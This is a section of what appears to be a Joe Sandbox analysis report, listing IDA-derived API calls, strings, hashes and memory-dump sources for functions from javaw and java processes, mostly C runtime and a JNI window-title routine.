                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                                    • API String ID: 3698121176-3819984048
                                                                                                                                                                                                                                    • Opcode ID: 88bef1543b8d85015b2b1b24bdb5b7c11f5e568ddf32cd1d1d1b397ae46ac6e6
                                                                                                                                                                                                                                    • Instruction ID: ca19dd587a6dec392ec9faf1c4f770da8440d46b3c24e45d5e7086126918fb33
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88bef1543b8d85015b2b1b24bdb5b7c11f5e568ddf32cd1d1d1b397ae46ac6e6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75315CB2D00724DBE7017B768D4B7093FF8EB9A261725062BE499B62D4DF3680438F54
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 73A9103A
                                                                                                                                                                                                                                    • GetWindowTextLengthA.USER32(?), ref: 73A91066
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 73A91073
                                                                                                                                                                                                                                      • Part of subcall function 73A9128D: __FF_MSGBANNER.LIBCMT ref: 73A912A6
                                                                                                                                                                                                                                      • Part of subcall function 73A9128D: __NMSG_WRITE.LIBCMT ref: 73A912AD
                                                                                                                                                                                                                                      • Part of subcall function 73A9128D: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,73A93512,?,00000001,?,?,73A93FA4,00000018,73A99BD0,0000000C,73A94034), ref: 73A912D2
                                                                                                                                                                                                                                    • GetWindowTextA.USER32(?,00000000,-00000002), ref: 73A91083
                                                                                                                                                                                                                                    • _free.LIBCMT ref: 73A910B4
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Text$AllocHeapLength_free_malloc
                                                                                                                                                                                                                                    • String ID: (Ljava/lang/String;)V$This string comes from JNI$changeString$com/Title
                                                                                                                                                                                                                                    • API String ID: 2407992236-2500405646
                                                                                                                                                                                                                                    • Opcode ID: 5b67dd134a63a8ff8b90ea1993242187319a72afc41ca3ce7062d62df8e8e81f
                                                                                                                                                                                                                                    • Instruction ID: a602176387bf7f5ac59044d64dee61da12fa337e09cb6c034be7cf277af4f7aa
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b67dd134a63a8ff8b90ea1993242187319a72afc41ca3ce7062d62df8e8e81f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B821C576600641AFE300EB6ECC86F5777EDFB892147254169E84DF7715DA31E802CBA4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                    • String ID: @$g
                                                                                                                                                                                                                                    • API String ID: 269201875-2917482895
                                                                                                                                                                                                                                    • Opcode ID: 6e3ac355f6e2c7c2b1c25858ab100b6c93854050422eb7d726143d9f1d6a8756
                                                                                                                                                                                                                                    • Instruction ID: 969aa92d8b61d590bf7c0d33ab10458dc3e276b1f4088470f51a8e7355b98881
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e3ac355f6e2c7c2b1c25858ab100b6c93854050422eb7d726143d9f1d6a8756
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C28159B184522D8AFB219F14CCCA7A8BBF9EB19304F2501DBD40AB61A9C7754BC5CF58
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,73A99B80,00000008,73A931AA,00000000,00000000,?,73A93512,?,00000001,?,?,73A93FA4,00000018,73A99BD0,0000000C), ref: 73A930B3
                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 73A930E7
                                                                                                                                                                                                                                      • Part of subcall function 73A94019: __mtinitlocknum.LIBCMT ref: 73A9402F
                                                                                                                                                                                                                                      • Part of subcall function 73A94019: __amsg_exit.LIBCMT ref: 73A9403B
                                                                                                                                                                                                                                      • Part of subcall function 73A94019: EnterCriticalSection.KERNEL32(00000000,00000000,?,73A91E57,?,?,73A91362,00000001,00000000,73A99B00,0000000C,73A91188,asdasdasdasdasdsdasd), ref: 73A94043
                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(73A9B590), ref: 73A930F4
                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 73A93108
                                                                                                                                                                                                                                    • ___addlocaleref.LIBCMT ref: 73A93126
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                    • String ID: KERNEL32.DLL
                                                                                                                                                                                                                                    • API String ID: 637971194-2576044830
                                                                                                                                                                                                                                    • Opcode ID: 59769e6f3b85f31bf294047453a18a7855f0eb4fe1ed60d46064469f82ea2014
                                                                                                                                                                                                                                    • Instruction ID: 18a660c98a1484c5f1b0432f916bd5dc1daa3218196ff06e84c1e99269624307
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59769e6f3b85f31bf294047453a18a7855f0eb4fe1ed60d46064469f82ea2014
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0013071801704EFF7209F6AD546749FBF4AF48325F20890FD496763A4CB74A540CB19
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 73A94E40
                                                                                                                                                                                                                                      • Part of subcall function 73A931CF: __getptd_noexit.LIBCMT ref: 73A931D2
                                                                                                                                                                                                                                      • Part of subcall function 73A931CF: __amsg_exit.LIBCMT ref: 73A931DF
                                                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 73A94E60
                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 73A94E70
                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 73A94E8D
                                                                                                                                                                                                                                    • _free.LIBCMT ref: 73A94EA0
                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(16DB1610), ref: 73A94EB8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3470314060-0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 73A95C52
                                                                                                                                                                                                                                      • Part of subcall function 73A9128D: __FF_MSGBANNER.LIBCMT ref: 73A912A6
                                                                                                                                                                                                                                      • Part of subcall function 73A9128D: __NMSG_WRITE.LIBCMT ref: 73A912AD
                                                                                                                                                                                                                                      • Part of subcall function 73A9128D: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,73A93512,?,00000001,?,?,73A93FA4,00000018,73A99BD0,0000000C,73A94034), ref: 73A912D2
                                                                                                                                                                                                                                    • _free.LIBCMT ref: 73A95C65
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                     • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                     • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                     • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                     • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocHeap_free_malloc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2734353464-0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 73A955C1
                                                                                                                                                                                                                                      • Part of subcall function 73A931CF: __getptd_noexit.LIBCMT ref: 73A931D2
                                                                                                                                                                                                                                      • Part of subcall function 73A931CF: __amsg_exit.LIBCMT ref: 73A931DF
                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 73A955D8
                                                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 73A955E6
                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 73A955F6
                                                                                                                                                                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 73A9560A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                     • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                     • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                     • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                     • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 938513278-0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 73A97A73
                                                                                                                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 73A97AA6
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,?,00000000,00000000,?,?,?,?,00000000,00000000), ref: 73A97AD7
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,00000001,00000000,00000000,?,?,?,?,00000000,00000000), ref: 73A97B45
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                     • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                     • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                     • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                     • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd0000_java.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd0000_java.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd0000_java.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%
